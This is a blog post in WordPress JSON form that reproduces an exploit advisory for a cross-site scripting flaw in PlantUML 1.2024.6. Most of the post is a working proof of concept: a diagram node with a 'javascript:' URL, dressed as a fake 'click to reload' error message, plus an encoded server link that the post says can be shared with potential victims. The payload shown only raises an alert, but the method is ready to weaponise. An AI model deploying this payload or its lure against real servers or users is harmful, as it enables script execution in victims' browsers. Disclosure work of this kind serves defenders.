{"id":59138,"date":"2024-08-23T19:59:51","date_gmt":"2024-08-23T16:59:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180344\/plantuml120246-xss.txt"},"modified":"2024-08-23T19:59:51","modified_gmt":"2024-08-23T16:59:51","slug":"plantuml-1-2024-6-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/plantuml-1-2024-6-cross-site-scripting\/","title":{"rendered":"PlantUML 1.2024.6 Cross Site Scripting"},"content":{"rendered":"

#Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)
#Date: 23\/08\/2024
#Exploit Author: Hosein Vita
#Vendor Homepage: https:\/\/plantuml.com\/
#Version: 1.2024.6
#Tested on: Linux<\/p>\n

Description:
This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user’s browser.<\/p>\n

Proof of Concept:
plantuml
Copy code
@startuml
digraph G {
graph [bgcolor=”white”];
node [shape=box, style=”rounded,filled”, color=”white”];
heading [fillcolor=”white”, label=<<table border=”0″ cellborder=”0″><tr><td align=”left”>Error – Failed to load the content.<br\/>Please click to reload..<\/td><\/tr><\/table>>, URL=”javascript:alert(1);”];
}
@enduml
Alternatively, you can reproduce the issue by appending the following string to https:\/\/<plantumlserver>\/plantuml\/svg\/:<\/p>\n

Copy code
PK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_V
This proof-of-concept remains stored and can be shared as a link with potential victims.<\/p>\n","protected":false},"excerpt":{"rendered":"

#Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)#Date: 23\/08\/2024#Exploit Author: Hosein Vita#Vendor Homepage: https:\/\/plantuml.com\/#Version: 1.2024.6#Tested on: Linux Description:This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59138","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59138","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59138"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59138\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59138"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59138"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59138"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}